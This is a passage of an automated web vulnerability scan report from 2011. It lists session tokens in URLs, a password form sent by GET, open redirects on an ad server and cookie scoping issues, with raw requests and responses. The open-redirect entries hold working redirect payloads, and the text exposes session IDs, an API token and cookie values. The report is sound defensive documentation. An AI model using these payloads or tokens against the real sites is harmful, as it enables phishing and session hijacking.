P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:59:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:59:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

7.7. http://raw.oggifinogi.com/Track.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://raw.oggifinogi.com
Path:	/Track.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

http://raw.oggifinogi.com/Track.aspx?playlistId=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&site=www.bostonherald.com&eventType=9&sessionId=96da82a9_fbdc_477a_8a8f_5f6e210ee338&data=Flash%20Version%3A10.1%20r103

Request

GET /Track.aspx?playlistId=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&site=www.bostonherald.com&eventType=9&sessionId=96da82a9_fbdc_477a_8a8f_5f6e210ee338&data=Flash%20Version%3A10.1%20r103 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

7.8. http://www.bostonherald.com/entertainment/movies/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/entertainment/movies/

Issue detail

The response contains the following links that appear to contain session tokens:

http://nmp.newsgator.com/NGBuzz/Buzz.ashx?buzzId=149584&apiToken=2B2E7D0407C94C67BA38AB2091B68BCD&mode=production&aid=bostonher&zip=02118&radius=5&units=mi&country=USA&trkM=AB137F30-E300-46C0-881C-286B26F890DA

Request

GET /entertainment/movies/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

7.9. http://www.quantcast.com/p-352ZWwG8I7OVQ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/p-352ZWwG8I7OVQ

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.quantcast.com/evite.com;jsessionid=14CB56AB65F99A643FDBA61F81B61593
http://www.quantcast.com/gawker.com;jsessionid=14CB56AB65F99A643FDBA61F81B61593
http://www.quantcast.com/hulu.com;jsessionid=14CB56AB65F99A643FDBA61F81B61593

Request

GET /p-352ZWwG8I7OVQ HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Sat, 29 Jan 2011 04:37:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<p>
Maybe you should try <a href="/hulu.com;jsessionid=14CB56AB65F99A643FDBA61F81B61593">hulu.com</a>, <a href="/gawker.com;jsessionid=14CB56AB65F99A643FDBA61F81B61593">gawker.com</a> or <a href="/evite.com;jsessionid=14CB56AB65F99A643FDBA61F81B61593">evite.com</a>
...[SNIP]...

8. Password field submitted using GET method previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://digg.com/submit

The form contains the following password field:

password

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9. Open redirection previous next
There are 3 instances of this issue:

/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 3]
/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]
/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 3]

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.

Summary

Severity:	Low
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of REST URL parameter 3 is used to perform an HTTP redirect. The payload http%3a//ab5c05f8be0257f29/a%3fhttp%3a was submitted in the REST URL parameter 3. This caused a redirection to the following URL:

http://ab5c05f8be0257f29/a?http:/t.mookie1.com/t/v1/clk

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http%3a//ab5c05f8be0257f29/a%3fhttp%3a/t.mookie1.com/t/v1/clk HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a4nEV8SZdIgAQfvqP3FdK03mNKNZbJXlpljZaSXaGZcoM4Zb7gRJlBi3yPEZcHJya2ZbwME28AQ7uJfndZcwasve2Gdiao1vTfsCrNZdZay8nJkD9IINBYcoW7cYbtVJSqCI4vGLmZd4Zbt2u6G5lP8Sri9J3Ru4pgX4JPSnBFa06bNrZdCrtQcaZbwgBcoxjp3nmxvPMaMOSZbQu6dL3Soqbr5KbZdxPrqnPdqAZbVDEqni5nn68qSeeDJThPHuiRZbm823EFRgZcKsxaPxbhh0pNxZdbeqG3hYq5JhhvwNXITFKX8FCRBUjp7R2rOwlEIsCp8i7nF5Zc2GoeCtSCegyHmuUrMjcjuNvb0Ld8FgKyGJ9ZdaCwKERN36w0xIKhDa7pxk4LZbyHsPlBPpu7GVDZdtU0dru94EsLQaoGrSY8hBVAptrW0F5YyBybcZa7X5ZcUpZauX2IeIJscjcLbYvhUA4uWY5GaVhTKeTO2oIEBjxp8VlBrMaGAnVbi9CVKZbu07CDIA3BDpe9ZaFCpv7McZdnBQGAT5tlk6EaQk7JLP0LiKwZck2W3TuYipI9eHZbDWPBrvM78aHKTTbDgZcWUAC; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:43 GMT;
Content-Type: text/html
Location: http://ab5c05f8be0257f29/a?http:/t.mookie1.com/t/v1/clk
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Low
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 3 is used to perform an HTTP redirect. The payload http%3a//a15c68dbdb35dc3b6/a%3fhttp%3a was submitted in the REST URL parameter 3. This caused a redirection to the following URL:

http://a15c68dbdb35dc3b6/a?http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http%3a//a15c68dbdb35dc3b6/a%3fhttp%3a/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a6nFNfMZaACxSqGp27XsxMMPnb6PH7MZboFL4ZdcZbYxt1XjjWDrfZa0bywXrenupXsgrHwe1jWRdhLY0C7xRity8MiYE5DLcZcyZcgZcFM6oU0X2EEJZcSpSZbBA3RIZbqDYl4xsylIuJx3OGhk7u8vMn9qiZb3EoC5PeqZakxQQsHLeksW7ZaprP6nVhThIuqtyWKwVlnUT8dCu65WaDjONBC94oOUpNrPjq6DQyZclTfg4LNgjcOSFD8SCMb5D8xND9bHwhNJgd8kna5G6tZdeM8ZcrXBIYyqu8uUcW6sor3R0l2SZakURB1a1UCM7QpZdZdYvgVwaXxfZdDGJMPTTDcb7f7VtSRZdVdtdZdAJqdFp9RZaFI4lsyWFYaEyrREFGvNWH4bEROUZdsms9GbGF24rIyCYwUObLqNpKa3EYbj3I0AlZbEMqFCZafAVXTAj3LDw3eNUuatKU9u0VYsTyrawgSQnLGLWtbMXt8Zc7aPQ328AM1CTPpsvmTWR7Thov8DfbRUY62NFndBFEwsp50oTCwpR77ft7yURKwdqW5py0SUFZc4VY12LC23bpMwwBQUarfLdwuTKXC4wtXqGjavEst6A; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:26 GMT;
Content-Type: text/html
Location: http://a15c68dbdb35dc3b6/a?http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Low
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 3 is used to perform an HTTP redirect. The payload http%3a//ad97bba2a29a29e53/a%3fhttp%3a was submitted in the REST URL parameter 3. This caused a redirection to the following URL:

http://ad97bba2a29a29e53/a?http:/pixel.quantserve.com/r

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http%3a//ad97bba2a29a29e53/a%3fhttp%3a/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aynEZcdRwEf4p2QVMrpvlrkX7PD0obh78ytQM8kVJx8SOU97tBPWFB52tuSub2MaqCPJ0TU1aVZb4K4VyqyINarNpsKyLBpjI5gDqUVy2hbGZaxG4W7P6JK0G8tOIhjHboZbmcEOZbfZbeKk3DvbrpMMZdkTSaLmGT4ZcEmAZcZaGY1kXQ37MGyev1QT6YfRMFd5PZcjhqmhPxFSZaA7EZbMVo2VSpgxZb7ZccdBLXkN0W2ZcNBO8lZc5ZdMHHKGwnWWjItMvVlda3ryuPEHbtfwQVjMXRBDiM98hcNZdHd7veVeNX0EZdK2SaZbmvEZcX3lHs2IPmUWFBMeQZdofP6MiJ4H74m3MwKXSpuxCEror6Xa4mDpECA3AZa9f8YbJiGK09MRZaR0630ZaZcqDXc3S3Y0VsaRnXCMY766LlVvVeogCgdTHZd1agpMZdIunqg1NFK04M3omEXy5NUThaLZcZcrqarQv0EK90GkAYZbE8yQXLoK0ZaoUqDsBYGo6PMNHFZcqwnAfg43W8vExOG3RYk5yN8XZbeuXOGnIwo3qijYLVpIvMTYCWA9i9mqZcjZbONhfB7hqsd3jdxqGsnWG1UFNZb6uXMooe; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:41 GMT;
Content-Type: text/html
Location: http://ad97bba2a29a29e53/a?http:/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10. Cookie scoped to parent domain previous next
There are 143 instances of this issue:

http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1
http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/
http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/
http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/
